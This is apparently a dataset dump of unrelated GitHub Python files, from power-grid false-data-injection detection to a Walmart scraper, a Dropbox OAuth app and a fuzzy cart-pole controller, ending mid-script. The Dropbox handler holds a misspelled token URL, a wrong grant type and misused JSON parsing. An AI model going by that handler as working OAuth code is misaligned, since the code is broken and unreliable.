utility_functions\n\nclass FPDM:\n \n def __init__(self, data, fpdm_model, lookback = 48, threshold = 0.4):\n self.data = data\n self.fpdm_model = fpdm_model\n self.lookback = lookback\n self.threshold = threshold\n pass\n \n def predict(self, model, batch):\n pass\n \n def barplot_for_specific_fdi(self, real_data, predicted_data, atk_vector_indx):\n inv_scaled_real_data = self.data.inv_scale(real_data)\n injected_data = self.data.inject_fixed_attackvec(inv_scaled_real_data, atk_vector_indx)\n injected_data = self.data.scale(injected_data)\n #injeted_data = injected_data[self.lookback:]\n print('injected_data shape == {}'.format(injected_data.shape))\n errors = abs(real_data - predicted_data)\n errors_fdi = abs(injected_data - predicted_data)\n t_err = [norm(i) for i in errors]\n t_err_fdi = [norm(i) for i in errors_fdi]\n utility_functions.show_barplot(data_list = [t_err, t_err_fdi], label = ['real','anomaly'], n_bins= 50)\n \n def get_forecasting_errors(self, real_data, predicted_data):\n predictions = self.data.inv_scale(predicted_data)\n real = self.data.inv_scale(real_data)\n mae = utility_functions.MAE(real, predictions)\n mse = utility_functions.MSE(real,predictions)\n rmse = utility_functions.RMSE(real,predictions)\n print('mae : {}, mse : {}, rmse : {}'.format(mae,mse,rmse))\n \n \n def is_fdi(self, real_data, predicted_data, threshold):\n errors = abs(real_data - predicted_data)\n fdi = []\n for i in errors:\n if norm(i)> threshold:\n fdi.append(1)\n else:\n fdi.append(0)\n return np.array(fdi)\n \n \n def get_prf(self, real_data, predicted_data, threshold):\n \n fdi = self.is_fdi(real_data, predicted_data, threshold)\n actual = np.zeros((real_data.shape[0],)) #calculating confusion matrix with only real data\n cm0 = confusion_matrix(actual,fdi, labels = [0,1])\n\n inv_scaled_real_data = self.data.inv_scale(real_data)\n injected_data, _ = self.data.inject_random_attackvec(inv_scaled_real_data)\n injected_data = self.data.scale(injected_data)\n \n fdi = self.is_fdi(injected_data, predicted_data, threshold)\n actual = np.ones((real_data.shape[0],))\n cm1 = confusion_matrix(actual,fdi, labels = [0,1])\n \n cm= cm0 + cm1 #adding confusion matrix with Fdi data\n return np.array(utility_functions.cm2prf(cm.T)), cm.T\n \n \n ","repo_name":"gcsarker/XTM","sub_path":"scripts/FPDM.py","file_name":"FPDM.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"37510967585","text":"\"\"\"Test CCD code against pyscf's ccd hack\"\"\"\nimport openfermion as of\nfrom qcpanop.cc.ccd import CCD\n\n\ndef test_ccd():\n from pyscf import gto, scf, cc\n from openfermionpyscf import run_pyscf\n\n geometry = [['H', (0., 0., 0.)], ['B', (0., 0., 1.6)]]\n mol = gto.M(\n atom=geometry,\n basis='cc-pvdz')\n\n mf = scf.RHF(mol).run()\n\n mycc = cc.CCSD(mf)\n mycc.frozen = 1\n old_update_amps = mycc.update_amps\n\n def update_amps(t1, t2, eris):\n t1, t2 = old_update_amps(t1, t2, eris)\n return t1 * 0, t2\n\n mycc.update_amps = update_amps\n mycc.kernel()\n\n print('CCD correlation energy', mycc.e_corr)\n\n\n molecule = of.MolecularData(geometry=mol.atom,\n basis=mol.basis,\n charge=mol.charge,\n multiplicity=mol.spin + 1)\n molecule = run_pyscf(molecule)\n cc = CCD(molecule=molecule)\n cc.solve_for_amplitudes()\n print('NCR-CCD energy ', cc.ccd_energy + molecule.nuclear_repulsion)\n print('NCR-CCD correlation energy ', cc.ccd_energy + molecule.nuclear_repulsion - cc.scf_energy)\n\n cc.pccd_solve()\n print('NCR-pCCD energy ', cc.ccd_energy + molecule.nuclear_repulsion)\n print('NCR-pCCD correlation energy ', cc.ccd_energy + molecule.nuclear_repulsion - cc.scf_energy)\n\n from qcpanop.cc.pccd import pCCD\n pccd = pCCD(molecule=molecule)\n pccd.compute_energy()\n\n\nif __name__ == \"__main__\":\n test_ccd()","repo_name":"ncrubin/qcpanop","sub_path":"qcpanop/cc/projective_cc/ccd_test.py","file_name":"ccd_test.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"35991763124","text":"from django.urls import path\nfrom .import views\n\napp_name='customer'\nurlpatterns = [\n path('', views.home, name=\"home\"),\n path('products/', views.products, name=\"products\"),\n path('profile/', views.profile, name=\"profile\"),\n path('payment/', views.payment, name=\"payment\"),\n \n]","repo_name":"AATHIRAKEDHARAM/cybershop","sub_path":"customer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71648045313","text":"import json\nimport time\n\nimport scrapy\nfrom bs4 import BeautifulSoup\n\n\n\n\nclass WalmartFoodBrowseSpider(scrapy.Spider):\n name = \"walmart_food_browse\"\n products = []\n def start_requests(self):\n\n base_url = 'https://www.walmart.com/browse/food/976759?page={page}'\n page = 1\n while True:\n url = base_url.format(page=page)\n yield scrapy.Request(url=url, callback=self.parse_result)\n page += 1\n time.sleep(1)\n if page == 26:\n break\n with open(\"../../../data/products.json\", \"w\") as f:\n json.dump(self.products, f)\n\n def parse_result(self, response):\n soup = BeautifulSoup(response.text, 'html.parser')\n data = soup.find_all('script', attrs={'id':'searchContent'})\n\n for d in data:\n contents = d.contents\n if len(contents) == 0:\n continue\n results = json.loads(contents[0])\n items = results[\"searchContent\"][\"preso\"][\"items\"]\n self.products.extend(items)\n\n\n\n def parse(self, response):\n page = response.url.split(\"/\")[-2]\n filename = 'quotes-%s.html' % page\n with open(filename, 'wb') as f:\n f.write(response.body)\n\n self.log('Saved file %s' % filename)","repo_name":"kforti/scraping_engine","sub_path":"product_page_scrapers/product_page_scrapers/spiders/walmart_food_browse_spider.py","file_name":"walmart_food_browse_spider.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39775842611","text":"from socket import socket\n\n\ndef main():\n # 默认就是创建TCP Socket\n with socket() as tcp_socket:\n # 连接服务器(没有返回值)\n tcp_socket.connect((\"127.0.0.1\", 8080))\n\n print(\"Connected TCP Server...\") # 连接提示\n\n # 发送消息(返回发送的字节数)\n tcp_socket.send(\"小张生日快乐~\\n\".encode(\"utf-8\"))\n # 接收消息\n msg = tcp_socket.recv(1024)\n print(f\"服务器:{msg.decode('utf-8')}\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lotapp/BaseCode","sub_path":"python/6.net/2.TCP/1.tcp_client.py","file_name":"1.tcp_client.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"21681154114","text":"#!/usr/bin/env python\n\nimport webapp2\nimport httplib2\nimport urllib\nimport json\nimport base64\nimport random\nimport time\nimport hmac\nimport binascii\nimport hashlib\nimport logging\nimport jinja2\nimport os\nfrom google.appengine.api import users\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n user = users.get_current_user()\n #self.session['twitter_user'] = False\n if user:\n url = users.create_logout_url(self.request.uri)\n url_linktext = 'Logout'\n\n else:\n url = users.create_login_url(self.request.uri)\n url_linktext = 'Login'\n\n template_values = {\n 'user': user,\n 'url': url,\n 'url_linktext': url_linktext\n }\n\n template = JINJA_ENVIRONMENT.get_template('jinja_template.html')\n self.response.write(template.render(template_values))\n\n\n\n\n\n#############\n## DROPBOX ##\n#############\n\nclass BaseHandler(webapp2.RequestHandler):\n\n def dispatch(self):\n # Get a session store for this request.\n self.session_store = sessions.get_store(request=self.request)\n\n try:\n # Dispatch the request.\n webapp2.RequestHandler.dispatch(self)\n finally:\n # Save all sessions.\n self.session_store.save_sessions(self.response)\n\n @webapp2.cached_property\n def session(self):\n # Returns a session using the default cookie key.\n return self.session_store.get_session()\n\nconfig = {}\nconfig['webapp2_extras.sessions'] = {'secret_key': 'my-super-secret-key'}\n\n\n\n\ndropbox_app_key='kq1dnywotn5al03'\ngae_callback_url='https://etxetemp.appspot.com/oauth_callbackDropbox'\ndropbox_app_secret=''\n\nclass LoginAndAuthorizeDropbox(webapp2.RequestHandler):\n def get(self):\n\n url='https://www.dropbox.com/1/oauth2/authorize'\n parametroak= {'response_type':'code',\n 'client_id':dropbox_app_key,\n 'redirect_uri':gae_callback_url\n }\n parametroak=urllib.urlencode(parametroak)\n self.redirect(url + '?' + parametroak)\n\n\n\nclass OAuthCallbackDropbox(BaseHandler):\n def get(self):\n request_url= self.request.url\n code=request_url.split('code=')[1]\n\n http=httplib2.Http()\n metodoa='POST'\n url='https://api.dropbox.com/1/oatuh2/token'\n parametroak={'code':code,\n 'grant_type': 'authorization.code',\n 'client_id': dropbox_app_key,\n 'client_secret':dropbox_app_secret,\n 'redirect_uri':gae_callback_url}\n\n parametroak=urllib.urlencode(parametroak)\n erantzuna, edukia=http.request(url, metodoa,body=parametroak, headers={})\n\n #self.response.write(edukia)\n\n json_edukia= json.load(edukia)\n self.session['access_token']=json_edukia['access_token']\n self.redirect('/welcomePage')\n\n\n\n\nclass WelcomePageDropbox(BaseHandler):\n def get(self):\n access_token=self.session['access_token']\n\n http=httplib2.Http()\n method='PUT'\n path='/karpeta/fitxategia.txt'\n url='https://api-content.dropbox.com/1/files_put/auto' + path\n parametroak={'overwrite':'false'}\n parametroak=urllib.urlencode(parametroak)\n goiburuak={}\n goiburuak['Authorization']='Bearer ' + access_token\n edukia='Hau fitxategiaren eduki da,,, probaa'\n resp, content = http.request(url + '?' + parametroak, method, body=edukia, headers=goiburuak)\n\n self.response.write('Egiaztatu zure Dropbox kontuan fitxategia sortu dela')\n\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler),\n ('/LoginAndAuthorizeDropbox', LoginAndAuthorizeDropbox),\n ('/oauth_callbackDropbox', OAuthCallbackDropbox),\n ('/welcomePageDropbox', WelcomePageDropbox)\n], debug=True)\n","repo_name":"xapraiz/etxetemp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23419351471","text":"f_in = open(\"A-small-attempt0.in\", 'r')\r\nf_out = open(\"a_real.out\", 'w')\r\n\r\ndef get_int():\r\n return int(f_in.readline().rstrip())\r\n\r\ndef get_row(n):\r\n grid = []\r\n for i in range(0, 4):\r\n grid.append(f_in.readline().rstrip())\r\n return grid[n-1].split()\r\n\r\nn = get_int()\r\n\r\nfor case in range(1, n + 1):\r\n first_row_n = get_int()\r\n first_row = get_row(first_row_n)\r\n \r\n second_row_n = get_int()\r\n second_row = get_row(second_row_n)\r\n\r\n shared = [i for i in first_row if i in second_row]\r\n\r\n result = \"MEOW\"\r\n\r\n if len(shared) == 1:\r\n result = shared[0]\r\n elif len(shared) == 0:\r\n result = \"Volunteer cheated!\"\r\n else:\r\n result = \"Bad magician!\"\r\n\r\n f_out.write(\"Case #{0}: {1}\\n\".format(case, result))\r\n\r\nf_in.close()\r\nf_out.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/586.py","file_name":"586.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42533972237","text":"\"\"\"\nExtends argparse.ArgumentParser with a facility for configuring subcommands by convention.\nEach subcommand lives in its separate Python module.\nThe name of the subcommand is the module name (without superpackage names)\nwith underscore replaced by dash.\nTo be a subcommand module, a module must have \n\nmeaning = \"some help text for the subcommand\"\ndef add_arguments(parser: ArgumentParser): ... # configure the subcommand's sub-parser\ndef execute(args: argparse.Namespace): ... # run the subcommand\n\nThe module can also optionally have:\n\naliases = [\"subcmd-alias1\", \"subcmd-alias2\"] # optional.\n\nfor calling the same subcommand by a different name (e.g. an abbreviation).\n\nTo use the mechanism, create the parser as usual and then call the submodule scanner:\n\nparser = ArgumentParser(epilog=explanation)\nparser.scan(\"mysubcmds.subcmd1\", \"mysubcmds.subcmd2\") # or provide module object instead of str\nargs = parser.parse_args()\nparser.execute_subcommand(args) # or supply nothing, then parse_args() will be called internally\n\nThe mechanism uses only one sub-parser group (which is rarely a relevant limitation).\nIt will execute importlib.import_module() on all modules mentioned in a scan() call as strings. \nMultiple calls to scan() are allowed, each can have one or more arguments.\nscan(..., strict=True) will exit when encountering a non-subcommand-module.\nSubcommands cannot be nested, there is only one level of subcommands.\n\"\"\"\n\n\nimport argparse\nimport glob\nimport importlib\nimport os.path\nimport re\nimport sys\nimport typing as tg\nimport warnings\n\n\nmoduletype = type(argparse)\nfunctiontype = type(lambda: 1)\n\n\nclass ArgumentParser(argparse.ArgumentParser):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.subparsers = self.add_subparsers(parser_class=argparse.ArgumentParser,\n dest='subcommand', required=True)\n self.subcommand_modules = dict() # map subcommand name to module\n\n def scan(self, *modules, strict=False, trace=False):\n for module in modules:\n # ----- obtain module and names:\n if isinstance(module, str):\n if module.endswith(\".*\"):\n self.scan_submodules(module[:-2], strict=strict, trace=trace)\n continue\n else:\n module = importlib.import_module(module) # turn str into module\n if not isinstance(module, moduletype):\n warnings.warn(f\"scan() arguments must be str or module: {module} {type(module)} ignored.\")\n continue # skip non-modules. \n module_fullname = module.__name__ # includes superpackages\n mm = re.search(r\"\\.?(\\w+)$\", module_fullname) # match last component or entire name\n module_name = mm.group(1)\n subcommand_name = module_name.replace(\"_\", \"-\")\n # ----- check for subcommand module:\n required_attrs = (('meaning', str), \n ('execute', functiontype), \n ('add_arguments', functiontype))\n if self._misses_any_of(module, required_attrs):\n if strict:\n print(f\"{module_name} is not a proper subcommand module\")\n sys.exit(1)\n else:\n if trace:\n print(f\"'{module_fullname}' is not a subcommand module\")\n continue # silently skip modules that are not proper subcommand modules\n if trace:\n print(f\"'{module_fullname}' found\")\n # ----- configure subcommand:\n self.subcommand_modules[subcommand_name] = module\n aliases = module.aliases if hasattr(module, 'aliases') else []\n for alias in aliases:\n self.subcommand_modules[alias] = module\n subparser = self.subparsers.add_parser(subcommand_name, help=module.meaning,\n aliases=aliases)\n module.add_arguments(subparser)\n\n def scan_submodules(self, modulename: str, strict=False, trace=False):\n if trace:\n print(f\"scan_submodules('{modulename}')\")\n module = importlib.import_module(modulename) # turn str into module\n file_name = module.__file__\n if file_name is None:\n raise ValueError(f\"'{modulename}' must lead to a directory with an __init__.py\")\n directory = os.path.dirname(file_name)\n for pyfile in glob.glob(os.path.join(directory, \"*.py\")):\n submodulebasename = os.path.basename(pyfile)[:-3] # last component without suffix\n if submodulebasename.startswith(\"_\"):\n continue # skip __init__py and anything that would become an option name\n submodulename = f\"{modulename}.{submodulebasename}\"\n self.scan(submodulename, strict=strict, trace=trace)\n\n def execute_subcommand(self, args: tg.Optional[argparse.Namespace] = None):\n if args is None:\n args = self.parse_args()\n self.subcommand_modules[args.subcommand].execute(args)\n\n @staticmethod\n def _misses_any_of(module: moduletype, required: tg.Sequence[tg.Tuple[str, type]]) -> bool:\n for name, _type in required:\n module_elem = getattr(module, name, None)\n if not module_elem or not isinstance(module_elem, _type):\n return True # this is not a subcommand-shaped submodule\n return False\n","repo_name":"serqco/qscript-framework","sub_path":"argparse_subcommand.py","file_name":"argparse_subcommand.py","file_ext":"py","file_size_in_byte":5520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26801039120","text":"from siptrackdlib.objectregistry import object_registry\nfrom siptrackdlib import treenodes\nfrom siptrackdlib import attribute\nfrom siptrackdlib import template\nfrom siptrackdlib import config\nfrom siptrackdlib import permission\nfrom siptrackdlib import errors\nfrom siptrackdlib import storagevalue\nfrom siptrackdlib.network import ipv4\nfrom siptrackdlib.network import ipv6\n\nvalid_protocols = ['ipv4', 'ipv6']\n\nclass NetworkTree(treenodes.BaseNode):\n class_id = 'NT'\n class_name = 'network tree'\n\n def __init__(self, oid, branch, protocol = None):\n super(NetworkTree, self).__init__(oid, branch)\n self._protocol = storagevalue.StorageValue(self, 'network-protocol', protocol)\n\n def _created(self, user):\n super(NetworkTree, self)._created(user)\n if self._protocol.get() not in valid_protocols:\n raise errors.SiptrackError('unknown network protocol')\n self._protocol.commit()\n\n def _loaded(self, data = None):\n super(NetworkTree, self)._loaded(data)\n if data != None:\n self._protocol.preload(data)\n\n def getFreeNetwork(self, range_start, range_end, user):\n \"\"\"Find a free network somewhere between range_start and range_end\n\n If an available network is found it is created and returned.\n range_start and range_end can either be address strings or\n Address objects of the appropriate type.\n \"\"\"\n range_start = self.addressFromString(range_start)\n range_end = self.addressFromString(range_end)\n if self.protocol == 'ipv4':\n return ipv4.get_free_network(self, range_start, range_end, user)\n elif self.protocol == 'ipv6':\n return ipv6.get_free_network(self, range_start, range_end, user)\n else:\n raise errors.SiptrackError('confused, invalid protocol in network tree?')\n\n def addNetwork(self, user, address):\n \"\"\"Create a network appropriate for the trees protocol.\n \n Simple convenience function.\n \"\"\"\n if self.protocol == 'ipv4':\n parent = ipv4.find_network_parent(self, address)\n node = parent.add(user, 'ipv4 network', address)\n elif self.protocol == 'ipv6':\n parent = ipv6.find_network_parent(self, address)\n node = parent.add(user, 'ipv6 network', address)\n else:\n raise errors.SiptrackError('confused, invalid protocol in network tree?')\n modified = [node] + list(node.listChildren())\n return node, modified\n\n def addRange(self, user, range):\n \"\"\"Create a range appropriate for the trees protocol.\n \n Simple convenience function.\n \"\"\"\n if self.protocol == 'ipv4':\n parent = ipv4.find_range_parent(self, range)\n return parent.add(user, 'ipv4 network range', range)\n elif self.protocol == 'ipv6':\n parent = ipv6.find_range_parent(self, range)\n return parent.add(user, 'ipv6 network range', range)\n else:\n raise errors.SiptrackError('confused, invalid protocol in network tree?')\n\n def networkExists(self, address):\n \"\"\"Check if a network exists.\n\n address can be either a string or an Address object.\n \"\"\"\n if self.protocol == 'ipv4':\n if ipv4.get_network(self, address):\n return True\n elif self.protocol == 'ipv6':\n if ipv6.get_network(self, address):\n return True\n else:\n raise errors.SiptrackError('confused, invalid protocol in network tree?')\n return False\n\n def getNetwork(self, address):\n \"\"\"Return a network or None if it doesn't exist.\n\n address can be either a string or an Address object.\n \"\"\"\n if self.protocol == 'ipv4':\n return ipv4.get_network(self, address)\n elif self.protocol == 'ipv6':\n return ipv6.get_network(self, address)\n else:\n raise errors.SiptrackError('confused, invalid protocol in network tree?')\n return False\n\n def getRange(self, range):\n \"\"\"Return a network range or None if it doesn't exist.\n\n range can be either a string or a Range object.\n \"\"\"\n if self.protocol == 'ipv4':\n return ipv4.get_range(self, range)\n elif self.protocol == 'ipv6':\n return ipv6.get_range(self, range)\n else:\n raise errors.SiptrackError('confused, invalid protocol in network tree?')\n return False\n\n def addressFromString(self, address):\n \"\"\"Convert an address string to an Address object.\n\n If an Address object is passed in it will be returned untouched.\n \"\"\"\n if self.protocol == 'ipv4':\n return ipv4.address_from_string(address)\n if self.protocol == 'ipv6':\n return ipv6.address_from_string(address)\n else:\n raise errors.SiptrackError('confused, invalid protocol in network tree?')\n\n def isValidAddressString(self, address):\n if self.protocol == 'ipv4':\n try:\n if ipv4.address_from_string(address):\n return True\n except errors.SiptrackError:\n pass\n elif self.protocol == 'ipv6':\n try:\n if ipv6.address_from_string(address):\n return True\n except errors.SiptrackError:\n pass\n return False\n\n def iterMissingNetworks(self):\n if self.protocol == 'ipv4':\n return ipv4.iter_missing_networks_from_tree(self)\n elif self.protocol == 'ipv6':\n return ipv6.iter_missing_networks_from_tree(self)\n else:\n raise errors.SiptrackError('confused, invalid protocol in network tree?')\n\n def _get_protocol(self):\n return self._protocol.get()\n\n def _set_protocol(self, val):\n self._protocol.set(val)\n protocol = property(_get_protocol, _set_protocol)\n\n# Add the objects in this module to the object registry.\no = object_registry.registerClass(NetworkTree)\no.registerChild(attribute.Attribute)\no.registerChild(attribute.VersionedAttribute)\no.registerChild(ipv4.Network)\no.registerChild(ipv4.NetworkRange)\no.registerChild(ipv6.Network)\no.registerChild(ipv6.NetworkRange)\no.registerChild(template.NetworkTemplate)\no.registerChild(config.ConfigValue)\no.registerChild(permission.Permission)\n\n","repo_name":"sii/siptrackd","sub_path":"siptrackdlib/network/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":6400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13899220766","text":"import argparse\nfrom pgmigrate2 import api\nimport sys\n\n\n\ndef init(args):\n api.init_db(args.DBURL)\n \ndef migrate(args):\n return api.migrate(args.REPO, args.DBURL)\n\ndef check(args):\n return api.check_status(args.REPO, args.DBURL)\n \ndef newpatch(args):\n return api.newpatch(args.REPO)\n\ndef main():\n parser = argparse.ArgumentParser(description='Database Migrations.')\n subparsers = parser.add_subparsers(title='subcommands',\n description='valid subcommands')\n \n parser_init = subparsers.add_parser('init', help='Initialize database with migration tracking.')\n parser_init.add_argument('DBURL', type=str, help='database connection URL')\n parser_init.set_defaults(func=init)\n\n parser_patch = subparsers.add_parser('newpatch', help='Create a new patch')\n parser_patch.add_argument('REPO', type=str, help='path to patch repo')\n parser_patch.set_defaults(func=newpatch)\n\n parser_check = subparsers.add_parser('check', help='Check migration status')\n parser_check.add_argument('REPO', type=str, help='path to patch repo')\n parser_check.add_argument('DBURL', type=str, help='database connection URL')\n parser_check.set_defaults(func=check)\n\n parser_migrate = subparsers.add_parser('migrate', help='Apply outstanding migrations')\n parser_migrate.add_argument('REPO', type=str, help='path to patch repo')\n parser_migrate.add_argument('DBURL', type=str, help='database connection URL')\n parser_migrate.add_argument('--dry-run', action='store_true', default=False, help='do not change anything')\n parser_migrate.set_defaults(func=migrate)\n\n \n args = parser.parse_args()\n \n retcode = args.func(args)\n \n sys.exit(retcode or 0) \n \nif __name__ == '__main__':\n main() ","repo_name":"mpapierski/pgmigrate2","sub_path":"pgmigrate2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"19999562542","text":"from numpy import max\nfrom decimal import *\nfrom math import sin, cos, pi\n\nclass fuzzyControl(object):\n def __init__(self):\n return\n\n def control(self, mdl):\n state = mdl.getState()\n position = state[0]\n inclination = state[1]\n linear_vel = state[2]\n angular_vel = state[3]\n\n # -------------------------------------------------------------\n # Inclination\n # -------------------------------------------------------------\n # Negative membership determination for inclination\n if inclination <= -0.1:\n negative_th = 1\n elif -0.1 < inclination < 0:\n negative_th = -10 * inclination\n else:\n negative_th = 0\n\n # Zero membership determination for inclination\n if -0.1 < inclination < -0.03:\n zero_th = -(100/7) * inclination + 10/7\n elif -0.03 <= inclination <= 0.03:\n if inclination<=0:\n zero_th= 1#+inclination\n else:\n zero_th=1-inclination\n elif 0.03 < inclination < 0.1:\n zero_th = (100 / 7) * inclination + 10 / 7\n else:\n zero_th = 0\n\n # Positive membership determination for inclination\n if inclination <= 0:\n positive_th = 0\n elif 0 < inclination < 0.1:\n positive_th = 10 * inclination\n else:\n positive_th = 1\n\n # -------------------------------------------------------------\n # Angular Velocity\n # -------------------------------------------------------------\n # Negative membership determination for angluar velocity\n if angular_vel <= -0.1:\n negative_thd = 1\n elif -0.1 < angular_vel < 0:\n negative_thd = -10 * angular_vel\n else:\n negative_thd = 0\n\n # Zero membership determination for angluar velocity\n if -0.15 < angular_vel < -0.03:\n zero_thd = -(100/12) * angular_vel + 15/12\n elif -0.03 <= angular_vel <= 0.03:\n if angular_vel<=0:\n zero_thd = 1#+angular_vel\n else:\n zero_thd = 1 - angular_vel\n elif 0.03 < angular_vel < 0.15:\n zero_thd = (100/12) * angular_vel + 15/12 # 1/(0.15-0.03)(que é = 8.333 = 100/12) * angular_vel + 0.15/(0.12-0.03)= 1.25 = 15/12\n else:\n zero_thd = 0\n\n # Positive membership determination for angular velocity\n if angular_vel <= 0:\n positive_thd = 0\n elif 0 < angular_vel < 0.1:\n positive_thd = 10 * angular_vel\n else:\n positive_thd = 1\n\n ######################## novas regras\n\n # -------------------------------------------------------------\n # Position\n # -------------------------------------------------------------\n # Negative membership determination for position\n if position <= -2:\n negative_x = 1\n elif -2 < position < 0:\n negative_x = -0.5 * position\n else:\n negative_x = 0\n\n # Zero membership determination for position\n if -1.5 < position < -0.5:\n zero_x = -position + 1.5\n elif -0.5 <= position <= 0.5:\n if position<=0:\n zero_x=1# + position\n else:\n zero_x=1-position\n elif 0.5 < position < 1.5:\n zero_x = position + 1.5\n else:\n zero_x = 0\n\n # Positive membership determination for position\n if position <= 0:\n positive_x = 0\n elif 0 < position < 2:\n positive_x = 0.5 * position\n else:\n positive_x = 1\n\n # -------------------------------------------------------------\n # Linear Velocity\n # -------------------------------------------------------------\n # Negative membership determination for linear velocity\n if linear_vel <= -3:\n negative_xd = 1\n elif -3 < linear_vel < 0:\n negative_xd = -(1/3) * linear_vel\n else:\n negative_xd = 0\n\n # Zero membership determination for linear velocity\n if -1.5 < linear_vel < -0.5:\n zero_xd = linear_vel + 1.5\n elif -0.5 <= linear_vel <= 0.5:\n if linear_vel<=0:\n zero_xd=1#+linear_vel\n else:\n zero_xd=1-linear_vel\n elif 0.5 < linear_vel < 1.5:\n zero_xd = linear_vel + 1.5\n else:\n zero_xd = 0\n\n # Positive membership determination for angular velocity\n if linear_vel <= 0:\n positive_xd = 0\n elif 0 < linear_vel < 3:\n positive_xd = (1/3) * linear_vel\n else:\n positive_xd = 1\n\n #inclination & ang. vel.\n NL_iav = [0]\n NM_iav = [0]\n NS_iav = [0]\n Z_iav = [0]\n PS_iav = [0]\n PM_iav =[0]\n PL_iav = [0]\n #position & lin. veloc.\n NL_plv = [0]\n NM_plv = [0]\n NS_plv = [0]\n Z_plv = [0]\n PS_plv = [0]\n PM_plv = [0]\n PL_plv = [0]\n # -------------------------------------------------------------\n # Output membership determination - pendulum rules\n # -------------------------------------------------------------\n # Pendulum rule # 1\n NL_iav.append(min(negative_th, negative_thd))\n # Pendulum rule # 2\n NM_iav.append(min(negative_th, zero_thd))\n # Pendulum rule # 3\n Z_iav.append(min(negative_th, positive_thd))\n # Pendulum rule # 4\n NS_iav.append(min(zero_th, negative_thd))\n # Pendulum rule # 5\n Z_iav.append(min(zero_th, zero_thd))\n # Pendulum rule # 6\n PS_iav.append(min(zero_th, positive_thd))\n # Pendulum rule # 7\n Z_iav.append(min(positive_th, negative_thd))\n # Pendulum rule # 8\n PM_iav.append(min(positive_th, zero_thd))\n # Pendulum rule # 9\n PL_iav.append(min(positive_th, positive_thd))\n\n # -------------------------------------------------------------\n # Output membership determination - CAR rules\n # -------------------------------------------------------------\n # CAR rule # 1\n NL_plv.append(min(negative_x, negative_xd))\n # CAR rule # 2\n NM_plv.append(min(negative_x, zero_xd))\n # CAR rule # 3\n Z_plv.append(min(negative_x, positive_xd))\n # CAR rule # 4\n NS_plv.append(min(zero_x, negative_xd))\n # CAR rule # 5\n Z_plv.append(min(zero_x, zero_xd))\n # CAR rule # 6\n PS_plv.append(min(zero_x, positive_xd))\n # CAR rule # 7\n Z_plv.append(min(positive_x, negative_xd))\n # CAR rule # 8\n PM_plv.append(min(positive_x, zero_xd))\n # CAR rule # 9\n PL_plv.append(min(positive_x, positive_xd))\n\n # Determination of the force applied to the car 1 // inclination and ang. velocity//-19/+19\n num_iav = max(NL_iav)*-120 + max(NM_iav)*-60 + max(NS_iav)*-6 + max(Z_iav)*0 + max(PS_iav)*6 + max(PM_iav)*60 + max(PL_iav)*120\n den_iav = max(NL_iav)+max(NM_iav)+max(NS_iav)+max(Z_iav)+max(PS_iav)+max(PM_iav)+max(PL_iav)\n\n # Determination of the force applied to the car (position + linear vel)\n num_plv = max(NL_plv)*-80 + max(NM_plv)*-17 + max(NS_plv)*-5 + max(Z_plv)*0 + max(PS_plv)*5 + max(PM_plv)*17 + max(PL_plv)*80\n den_plv = max(NL_plv)+max(NM_plv)+max(NS_plv)+max(Z_plv)+max(PS_plv)+max(PM_plv)+max(PL_plv)\n\n iav = num_iav / den_iav\n plv = num_plv / den_plv\n resp = (iav+plv)\n\n return resp\n","repo_name":"HandreMelo/EngComputacao","sub_path":"IA/Fuzzy/fuzzyContro.py","file_name":"fuzzyContro.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"34682521354","text":"import datetime as dt\nimport pandas_datareader.data as web\nfrom pandas_datareader import wb\nimport os\n\ntickers = ['USD=X',\n 'EUR=X',\n 'CNY=X',\n 'JPY=X',\n 'GBP=X',\n 'INR=X',\n 'BRL=X',\n 'CAD=X',\n 'RUB=X',\n 'AUD=X',\n 'MXN=X',\n 'IDR=X',\n 'TRY=X',\n 'CHF=X',\n 'SAR=X',\n 'ARS=X',\n 'SEK=X',\n 'THB=X',\n 'NGN=X',\n 'IRR=X']\n\nsuccessfulTickers = []\n\ncountries = ['US',\n 'EU',\n 'CN',\n 'JP',\n 'GB',\n 'IN',\n 'BR',\n 'CA',\n 'RU',\n 'AU',\n 'MX',\n 'ID',\n 'TR',\n 'CH',\n 'SA',\n 'AR',\n 'SE',\n 'TH',\n 'NG',\n 'IR']\n\nsuccessfulCountries = []\n\ndef getForexData(startDate, endDate, ticker):\n df = web.DataReader(ticker, 'yahoo', startDate, endDate);\n return df['Adj Close']\n\ndef getGDPData(startYear, endYear, country):\n df = wb.download(indicator='NY.GDP.MKTP.KD', country=[country], start=startYear, end=endYear)\n return df\n\nprint(\"Enter the currency code (eg. 